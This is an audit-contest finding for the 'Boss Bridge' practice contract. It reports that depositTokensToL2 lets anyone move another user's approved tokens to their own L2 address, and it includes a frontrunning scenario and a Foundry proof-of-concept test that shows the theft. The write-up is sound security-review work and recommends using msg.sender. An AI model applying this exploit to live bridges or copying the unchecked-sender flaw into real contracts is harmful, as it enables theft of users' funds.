First Flight #4: Boss Bridge

First Flight #4

Beginner FriendlyFoundryBridge

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Deposit call can be frontrun

bbcrypt

Summary

Deposit call can be frontrun as the owner of the tokens is not checked

Vulnerability Details

The function transfer an amount of tokens from an address passed as parameter, but it doesn't check that the caller of the function is actually the owner of the tokens. This opens up the following attack vector:

- User own 100 tokens
- User approves the `BossBridge` so he can call `Deposit`
- User calls `Deposit(Alice, AliceOnL2, 100)`
- Attacker is watching the mempool for any `Deposit()` calls.
- Attacker submits a transaction with the following params: `Deposit(Alice, AttackerOnL2, 100)` and pays a higher gas fee
- Attacker transaction is mined before Alice's and the tokens will be minted on L2 to the AttackerOnL2 address using Alice tokens

Impact

High

Tools Used

Manual

Recommendations

Transfer the tokens from the msg.sender

PoC:

function testUserCanDepositTokensFromAnotherUser() public {

// create attacker addresses

address attacker = makeAddr("attacker");

address attackerInL2 = makeAddr("attackerInL2");

// approve Bridge to transfer the tokens

uint256 initialUserBalance = token.balanceOf(address(user));

vm.startPrank(user);

uint256 amount = 10e18;

token.approve(address(tokenBridge), amount);

vm.stopPrank();

// attacker deposit the amount from the user

vm.startPrank(attacker);

vm.expectEmit(address(tokenBridge));

emit Deposit(user, attackerInL2, amount);

tokenBridge.depositTokensToL2(user, attackerInL2, amount);

// tokens has been transffered

assertEq(token.balanceOf(address(vault)), amount);

assertEq(token.balanceOf(address(user)), initialUserBalance- amount);

vm.stopPrank();

}

Updates

Lead Judging Commences

0xnevi Lead Judge about 2 years ago

Submission Judgement Published

Validated

Assigned finding tags:

depositTokensToL2(): abitrary from address

Rewards breakdown

nSLOC

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.